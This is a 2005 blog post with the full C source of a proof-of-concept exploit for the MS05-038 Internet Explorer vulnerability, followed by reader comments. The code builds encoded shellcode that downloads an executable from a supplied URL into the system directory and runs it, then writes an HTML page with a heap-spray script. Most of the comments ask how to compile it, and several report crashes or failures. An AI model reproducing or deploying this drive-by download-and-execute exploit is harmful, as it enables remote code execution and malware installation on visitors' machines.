
执行成功后会生成zwell_ms05038.html文件,运行即可.

/*+++++++++++++++++++++++++++++++++++++++++++++++
      Ms05 038 exploit POC
        Write By ZwelL
          2005 8 11
  http://www.donews.net/zwell
        zwell@sohu.com

Some code belongs to Lion(cnhonker), regards to him.
This code tested on Windows 2003
-----------------------------------------------*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

// Use for find the ASM code
#define PROC_BEGIN                     __asm _emit 0x90 __asm  _emit 0x90\
                                       __asm _emit 0x90 __asm  _emit 0x90\
                                       __asm _emit 0x90 __asm  _emit 0x90\
                                       __asm _emit 0x90 __asm  _emit 0x90
#define PROC_END                       PROC_BEGIN
#define SEARCH_STR                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define SEARCH_LEN                     8
#define MAX_SC_LEN                     2048
#define HASH_KEY                       13

// Define Decode Parameter
#define DECODE_LEN                     21
#define SC_LEN_OFFSET                  7
#define ENC_KEY_OFFSET                 11
#define ENC_KEY                        0xff


// Define Function Addr
#define ADDR_LoadLibraryA              [esi]
#define ADDR_GetSystemDirectoryA       [esi+4]
#define ADDR_WinExec                   [esi+8]
#define ADDR_ExitProcess               [esi+12]
#define ADDR_URLDownloadToFileA        [esi+16]

// Need functions
unsigned char functions[100][128] =        
{                                           // [esi] stack layout
    // kernel32 4                           // 00 kernel32.dll
    {"LoadLibraryA"},                       //    [esi]
    {"GetSystemDirectoryA"},                //    [esi+4]
    {"WinExec"},                            //    [esi+8]      
    {"ExitProcess"},                        //    [esi+12]
    // urlmon  1                            // 01 urlmon.dll
    {"URLDownloadToFileA"},                 //    [esi+16]  
    {""},
};
    
// Shellcode string
unsigned char  sc[1024] = {0};
unsigned int   Sc_len;

char *htmlbody1=
"<html><body>\r\n"
"<SCRIPT language=\"javascript\">\r\n"
"shellcode = unescape(\"%u4343%u4343\"+\"";

char *htmlbody2=
"\");\r\n"
"bigblock = unescape(\"%u0D0D%u0D0D\");\r\n"
"headersize = 20;\r\n"
"slackspace = headersize+shellcode.length;\r\n"
"while (bigblock.length<slackspace) bigblock+=bigblock;\r\n"
"fillblock = bigblock.substring(0, slackspace);\r\n"
"block = bigblock.substring(0, bigblock.length-slackspace);\r\n"
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n"
"memory = new Array();\r\n"
"for (i=0;i<750;i++) memory[i] = block + shellcode;\r\n"
"</SCRIPT>\r\n"
"<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n"
"Ms05038 Exploit POC<br>\r\n"
"Made By ZwelL< http://www.donews.net/zwell>\r\n"
"</html>";

// ASM shellcode main function
void    ShellCode();

// Get function hash
static DWORD __stdcall GetHash ( char *c )
{
    DWORD h = 0;
    
    while ( *c )
    {
        __asm ror h, HASH_KEY
        
        h += *c++;
    }
    return( h );
}

int buildfile(unsigned char *sc, int len)
{
    int i;
    char writebuf[4096];
    char tmp[4096];
    FILE *stream;

    memset(tmp, 0, 4096);
    memset(writebuf, 0, 4096);
    for(i = 0; i < len; i++)
    {
        sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff);
    }
    
    if(strlen(writebuf)%4!=0)
        strcat(writebuf, "00");

    for(i=0; i<(strlen(writebuf)/4); i++)
    {
        strcat(tmp, "\%u");
        strncat(tmp, &writebuf[i*4+2], 2);
        strncat(tmp, &writebuf[i*4], 2);
    }

    //printf("%s\n", writebuf);
    //printf("======================\n%s\n", tmp);
    
    if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != NULL )
    {
        fwrite(htmlbody1, strlen(htmlbody1), 1, stream);
        fwrite( tmp, strlen(tmp), 1, stream );
        fwrite(htmlbody2, strlen(htmlbody2), 1, stream);
        fclose(stream);
    }
    else
    {
        printf("fopen wrong\n");
        exit(0);
    }
    return 0;
}

void Make_ShellCode(char *url1)
{
    unsigned char  *pSc_addr;
    unsigned int   Enc_key=ENC_KEY;
    unsigned long  dwHash[100];
    unsigned int   dwHashSize;
    int i,j,k,l;
    
    
    // Get functions hash
    //printf("[+] Get functions hash strings.\r\n");
    for (i=0;;i++)
    {
        if (functions[i][0] == '\x0') break;

        dwHash[i] = GetHash((char*)functions[i]);
        //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
    }
    dwHashSize = i*4;


    // Deal with shellcode
    pSc_addr = (unsigned char *)ShellCode;
    
    for (k=0;k<MAX_SC_LEN;++k )
    {
        if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0)
        {
            break;
        }
    }
    pSc_addr+=(k+SEARCH_LEN);               // Start of the ShellCode
    
    for (k=0;k<MAX_SC_LEN;++k)
    {
        if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
            break;
        }
    }
    Sc_len=k;                               // Length of the ShellCode
    
    memcpy(sc, pSc_addr, Sc_len);           // Copy shellcode to sc[]


    // Add functions hash
    memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
    Sc_len += dwHashSize;

    // Add url
    memcpy(sc+Sc_len, url1, strlen(url1)+1);  
    Sc_len += strlen(url1)+1;    

    // Deal with find the right XOR byte
    for(i=0xff; i>0; i--)
    {
        l = 0;
        for(j=DECODE_LEN; j<Sc_len; j++)
        {
            if (
                   ((sc[j] ^ i) == 0x26) || //%
                   ((sc[j] ^ i) == 0x3d) || //=
                   ((sc[j] ^ i) == 0x3f) || //?
                   ((sc[j] ^ i) == 0x40) || //@
                   ((sc[j] ^ i) == 0x00) ||
                   ((sc[j] ^ i) == 0x0D) ||
                   ((sc[j] ^ i) == 0x0A)
                )                           // Define Bad Characters
            {
                l++;                        // If found the right XOR byte,l equals 0
                break;
            };
        }
    
        if (l==0)
        {
            Enc_key = i;
            
            //printf("[+] Find XOR Byte: 0x%02X\n", i);
            for(j=DECODE_LEN; j<Sc_len; j++)
            {
                sc[j] ^= Enc_key;
            }

            break;                          // If found the right XOR byte, Break
        }
    }

    // Deal with not found XOR byte
    if (l!=0)
   {
        printf("[-] No xor byte found!\r\n");
        exit(-1);
    }

    // Deal with DeCode string
    *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;
    *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;
    
    printf("[+] download url:%s\n", url1);
}

int help()
{
    printf("Usage : ms05038.exe url [-t] \n");
    printf("    the 't' option will let you test for the shellcode first\n");
    exit(0);
}

void main(int argc, char **argv)
{
    WSADATA        wsa;
    unsigned char url[255]={0};
    BOOL b_test;

    printf("\n========================================\n");
    printf("Ms05-038 exploit POC\n");
    printf("Write By Zwell\n");
    printf("2005-8-11\n");
    printf("http://www.donews.net/zwell\n");
    printf("zwell@sohu.com\n");
    printf("========================================\n\n");
    b_test=FALSE;
    if(argc<2)
        help();
    
    strncpy(url, argv[1], 255);

    if(argc == 3)
        if(!strcmp(argv[2], "-t"))
            b_test = TRUE;

    WSAStartup(MAKEWORD(2,2),&wsa);
    
    Make_ShellCode(url);
    printf("[+] Build shellcode successful\n");
    buildfile(sc, Sc_len);
    printf("[+] Build file successful\n");
    printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck ^_^\n");


    if(b_test)
    {
        printf("Testing the shellcode...\n");
        ((void (*)(void)) &sc)();
    }
    return;
}

// ShellCode function
void ShellCode()
{
    __asm
    {
        PROC_BEGIN                          // C macro to begin proc
//--------------------------------------------------------------------
//
// DeCode
//
//--------------------------------------------------------------------
        jmp     short decode_end
        
decode_start:
        pop     ebx                         // Decode start addr (esp -> ebx)
        dec     ebx
        xor     ecx,ecx
        mov     cl,0xFF                     // Decode len
        
    decode_loop:
        xor     byte ptr [ebx+ecx],ENC_KEY     // Decode key
        loop    decode_loop
        jmp     short decode_ok

decode_end:
        call    decode_start
        
decode_ok:

//--------------------------------------------------------------------
//
// ShellCode
//
//--------------------------------------------------------------------
        jmp     sc_end
        
sc_start:        
        pop     edi                         // Hash string start addr (esp -> edi)

        // Get kernel32.dll base addr
        mov     eax, fs:0x30                // PEB
        mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
        mov     esi, [eax+0x1c]             // InInitOrder.flink
        lodsd                               // eax = InInitOrder.blink
        mov     ebp, [eax+8]                // ebp = kernel32.dll base address

        mov     esi, edi                    // Hash string start addr -> esi
    
        // Get function addr of kernel32
        push    4
        pop     ecx
        
    getkernel32:
        call    GetProcAddress_fun
        loop    getkernel32

        // Get function addr of urlmon    
        push    0x00006e6f
        push    0x6d6c7275                 // urlmon
        push    esp
        call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");
        
        mov     ebp, eax                   // ebp = urlmon.dll base address
        
/*
        push    1
        pop     ecx

    geturlmon:
        call    GetProcAddress_fun
        loop    geturlmon
*/
        call    GetProcAddress_fun

        // url start addr = edi
        
//LGetSystemDirectoryA:
        sub     esp, 0x20
        mov     ebx, esp
        
        push    0x20
        push    ebx
        call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA
        
//LURLDownloadToFileA:    
        // eax = system path size
        // URLDownloadToFileA url save to a.exe
        mov     dword ptr [ebx+eax], 0x652E615C           // "\a.e"
        mov     dword ptr [ebx+eax+0x4], 0x00006578       // "xe"
        xor     eax, eax
        push    eax
        push    eax
        push    ebx                         // %systemdir%\a.exe
        push    edi                         // url
        push    eax
        call    ADDR_URLDownloadToFileA     // URLDownloadToFileA
        
//LWinExec:
        mov     ebx, esp
        push    eax
        push    ebx
        call    ADDR_WinExec                // WinExec(%systemdir%\a.exe);

Finished:
        //push    1
        call    ADDR_ExitProcess            // ExitProcess();

GetProcAddress_fun:    
        push    ecx
        push    esi
    
        mov     esi, [ebp+0x3C]             // e_lfanew
        mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
        add     esi, ebp                    // rva2va
        push    esi
        mov     esi, [esi+0x20]              // AddressOfNames RVA
        add     esi, ebp                    // rva2va
        xor     ecx, ecx
        dec     ecx

    find_start:
        inc     ecx
        lodsd
        add     eax, ebp
        xor     ebx, ebx
        
    hash_loop:
        movsx   edx, byte ptr [eax]
        cmp     dl, dh
        jz      short find_addr
        ror     ebx, HASH_KEY               // hash key
        add     ebx, edx
        inc     eax
        jmp     short hash_loop
    
    find_addr:
        cmp     ebx, [edi]                  // compare to hash
        jnz     short find_start
        pop     esi                         // ExportDirectory
        mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
        add     ebx, ebp                    // rva2va
        mov     cx, [ebx+ecx*2]             // FunctionOrdinal
        mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
        add     ebx, ebp                    // rva2va
        mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
        add     eax, ebp                    // rva2va
        stosd                               // function address save to [edi]
        
        pop     esi
        pop     ecx
        ret
        
sc_end:
        call sc_start
      
        PROC_END                            //C macro to end proc
    }
}



[点击此处收藏本文]   发表于 2005年08月11日 3:43 PM


 
superhei 发表于2005-08-11 10:45 PM  IP: 218.75.132.*
踩一脚

老乡 还好不咯

 
Y.Q.Hun 发表于2005-08-11 11:32 PM  IP: 222.58.52.*
好。。太好了。。。。

 
fuju 发表于2005-08-12 12:43 AM  IP: 221.232.93.*

 
zwell 发表于2005-08-12 9:27 AM  IP: 210.21.230.*
to superhei:
还好,就是工作开始忙起来了,你呢,现在是放假还是在实习啊?
估计快要正式动刀了吧,呵呵...

 
tombook 发表于2005-08-12 9:34 AM  IP: 222.95.55.*
比较吃内存,也容易引起IE出错

 
tombook 发表于2005-08-12 9:36 AM  IP: 222.95.55.*
to superhei:

你不是学医的吧?打死我也不给你治。嘿嘿

 
david 发表于2005-08-12 11:20 AM  IP: 221.221.94.*
很好。想交流漏洞利用技术。请留下你的邮箱地址.我的是usdragon@sina.com

 
lele 发表于2005-08-12 11:49 AM  IP: 218.200.225.*
厉害 只有欣赏的份了

 
wofeiwo 发表于2005-08-12 5:54 PM  IP: 218.81.155.*
to : tombook
heige是学医的..听说最近刚妇产科实习归来.....

 
yonker 发表于2005-08-13 1:22 AM  IP: 220.173.41.*
耗内存………………

 
daniel 发表于2005-08-13 11:43 AM  IP: 222.79.124.*
奇怪,我用VC++6.0,好像编译不过去,,,大家是怎么编译的。

 
POWER 发表于2005-08-13 6:54 PM  IP: 222.242.148.*
嗯,兄弟,不错,支持,收到我的MAIL了吗?

 
superhei 发表于2005-08-13 9:00 PM  IP: 218.75.132.*
我还熬熬~~~

 
mutiger 发表于2005-08-14 1:12 AM  IP: 220.184.115.*
请问如何编译啊

 
mutiger 发表于2005-08-14 1:42 AM  IP: 220.184.65.*
实在不会搞啊。老大。有编译好的吗

 
Tyn0r 发表于2005-08-14 5:17 AM  IP: 84.100.75.*
error :

Compilateur: Default compiler
Exécution de gcc.exe...
gcc.exe "C:\Dev-Cpp\aTx\SansNom1.c" -o "C:\Dev-Cpp\aTx\SansNom1.exe" -pg -g3 -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lgmon -pg -g3
C:\Dev-Cpp\aTx\SansNom1.c: In function `GetHash':
C:\Dev-Cpp\aTx\SansNom1.c:80: error: syntax error before "ror"

C:\Dev-Cpp\aTx\SansNom1.c: In function `main':

C:\Dev-Cpp\aTx\SansNom1.c:238: warning: return type of 'main' is not `int'
C:\Dev-Cpp\aTx\SansNom1.c: In function `ShellCode':
C:\Dev-Cpp\aTx\SansNom1.c:281: error: syntax error before '{' token

Exécution terminée

 
Tyn0r 发表于2005-08-14 5:18 AM  IP: 84.100.75.*
help me !

 
Problem 发表于2005-08-14 8:38 AM  IP: 211.27.131.*
Gday guys I am facing the same problem as Tyn0r and I use Dev C++ aswell. Could you please inform us on what we need to compile it. my msn is blindesk8er2002@hotmail.com or you cna just post the solution here.

Many Thanks,

Pico

P.S: Zwell your a fuckin legend! :D:D

 
zwell 发表于2005-08-14 9:37 AM  IP: 219.134.42.*
to everybody:
I used vc++.net to compile this. If you guys use dev-c++, you should know the different in handling "asm", like :

__asm ror h, HASH_KEY

you must changed it as:
__asm ("ror h, HASH_KEY");

because dev-c++ use gcc for its compiler...


Another thing you should pay attention to is the type of the funcion--"main", it must "int" but not "void" in dev-c++.

Whatever, good luck...

 
PicoWico 发表于2005-08-14 10:04 AM  IP: 211.27.131.*
Hello Zwell,

I thank you very much for your help. Although there is 1 error left still :S

Compiler: Default compiler
Executing gcc.exe...
gcc.exe "C:\New Folder\ms05038.c" -o "C:\New Folder\ms05038.exe" -g3 -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -g3
C:\New Folder\ms05038.c: In function `ShellCode':
C:\New Folder\ms05038.c:293: error: syntax error before '{' token

Execution terminated


--------------------------- Source

// ShellCode function
void ShellCode()
{
__asm
{
PROC_BEGIN // C macro to begin proc
//--------------------------------------------------------------------

 
PicoWico 发表于2005-08-14 2:39 PM  IP: 211.27.131.*
help please dude!!! :(:(

 
zwell 发表于2005-08-14 3:04 PM  IP: 210.21.230.*
it's all the same, change all the "asm" to gcc's style...

 
PicoWico 发表于2005-08-14 3:18 PM  IP: 211.27.131.*
I've done that but it doesn't help it :S I tried compiling it with visual c++ also with all the headers and no success >,<

Could you possibly compile it or change it into dev c++ code :/

Thanks mate,

Pico

 
alpha 发表于2005-08-15 8:39 AM  IP: 222.90.25.*
hello zwell
i want to ask which os can be used by this code ?
i tested it on win2000server sp0 unsuccess
i tested it on xp sp2 ,the ie had a error

 
Hey 发表于2005-08-15 1:15 PM  IP: 211.27.131.*
Hey Alpha dude how did you compile it??? IF you don't wanna tell me can u host the compiled version -,-

Thanks

 
EmJKHuang 发表于2005-08-15 3:28 PM  IP: 61.219.36.*
Hum...

How do compile the fxxking?

It sounds that speaker complained failing in operating.

In order to compile it successfully, you ought to learn the basic !

Not Just Waits for the product !

All I learned from the code is the theorem, special thanks to ZWelL spend time for it. :)

I'd like to convert the instrusions into formal shellcode.

 
QQ281399636EMail:pinxu520@163.com 发表于2005-08-15 4:31 PM  IP: 202.103.223.*
hi ZWelL
I compiled it on VC++6.0 -- the compile itself is fine -- but I have to tell you it doesn't work on any system I tried: Win2000, WinXP and Win2003 all fail.
Unlucky to say so.
So I think this exploit doesn't work and can't succeed.
Has anyone succeeded? Please contact me on QQ:281399636
or email pinxu520@163.com
Thanks, and still thanks ZWelL

 
اhidy 发表于2005-08-16 12:14 AM  IP: 82.167.11.*
How to complile this ? can I have compile file

thank you

 
newdragon 发表于2005-08-16 4:39 PM  IP: 222.76.236.*
生成的html到底执行后会造成什么后果?

 
Snowcrash 发表于2005-08-17 11:24 AM  IP: 67.172.230.*
I am using vs.net to build.
I created a command line application.
I then told it to compile a release version.
I got some ""Cannot convert unsigned char[255] to char * for url. (On the strncpy and Make_ShellCode calls)
1st I changed url from 'unsigned char url[255]={0} to char url[255]={0}
It built but just crashes IE when I open it up.
2nd I changed to url back then tried strncpy((char*)url, . . and Make_ShellCode((char*)url); It also built but still crashes IE.

I tested on XP sp2 and Win2k both using IE 6.

Any hints to get it work would be nice at this point. My guess is the unsigned char might be messing up the shell code

 
QQ281399636EMail:pinxu520@163.com 发表于2005-08-17 9:22 PM  IP: 207.69.167.*
failture again

who can help me

thanks so much

 
ddd@ss.com 发表于2005-08-25 6:23 AM  IP: 161.44.173.*
code sucks, doesnt even work!!

 
dude 发表于2005-08-30 1:43 AM  IP: 82.80.53.*
yo man, i got the same prob as Snowcrash... ur code's amazing man...plz tell me how to fix that unsigned shit coz no matter what i try, the prog just keeps crashing. btw Snowcrash, if u find a solution plz post

 
myxex 发表于2005-09-11 2:32 AM  IP: 219.135.12.*
编译成功了!生成文件后运行后内存资源狂占,引起死机而且不起作用!
不知道代码是否出错呢?
请指教!~
